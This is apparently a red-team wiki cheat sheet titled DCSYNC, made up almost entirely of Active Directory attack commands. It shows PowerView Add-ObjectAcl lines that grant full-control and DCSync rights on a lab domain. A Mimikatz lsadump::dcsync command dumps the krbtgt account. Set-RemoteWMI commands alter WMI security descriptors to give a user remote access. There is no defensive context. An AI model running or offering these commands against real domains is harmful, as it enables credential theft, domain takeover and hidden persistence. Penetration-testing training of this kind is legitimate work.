DCSYNC

From RCATs
Revision as of 20:19, 20 January 2023 by Ali3nw3rx (talk | contribs) (Created page with "Category:Active Directroy = DCSync = == '''Add full-control rights''' == <pre>Add-ObjectAcl -TargetDistinguishedName ‘DC=dollarcorp,DC=moneycorp,DC=local’ -PrincipalSamAccountName <username> -Rights All -Verbose</pre> == '''Add rights for DCsync''' == <pre>Add-ObjectAcl -TargetDistinguishedName ‘DC=dollarcorp,DC=moneycorp,Dc=local’ -PrincipalSamAccountName <username> -Rights DCSync -Verbose</pre> == '''Execute DCSync and dump krbtgt''' == <pr...")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)


DCSync

Add full-control rights

Add-ObjectAcl -TargetDistinguishedName ‘DC=dollarcorp,DC=moneycorp,DC=local’ -PrincipalSamAccountName <username> -Rights All -Verbose

Add rights for DCsync

Add-ObjectAcl -TargetDistinguishedName ‘DC=dollarcorp,DC=moneycorp,Dc=local’ -PrincipalSamAccountName <username> -Rights DCSync -Verbose

Execute DCSync and dump krbtgt

Invoke-Mimikatz -Command '"lsadump::dcsync /user:<domain>\krbtgt"'

Security Descriptor - WMI

. ./Set-RemoteWMI.ps1

On a local machine

Set-RemoteWMI -Username <username> -Verbose

On a remote machine without explicit credentials

Set-RemoteWMI -Username <username> -Computername <computername> -namespace ‘root\cimv2’ -Verbose

On a remote machine with explicit credentials

Only root/cimv and nested namespaces 

Set-RemoteWMI -Username <username> -Computername <computername> -Credential Administrator -namespace ‘root\cimv2’ -Verbose

On remote machine remove permissions

Set-RemoteWMI -Username <username> -Computername <computername> -namespace ‘root\cimv2’ -Remove -Verbose

Check WMI permissions

Get-wmiobject -Class win32_operatingsystem -ComputerName <computername>
Retrieved from "https://rcats.dev/rcats/index.php?title=DCSYNC&oldid=79"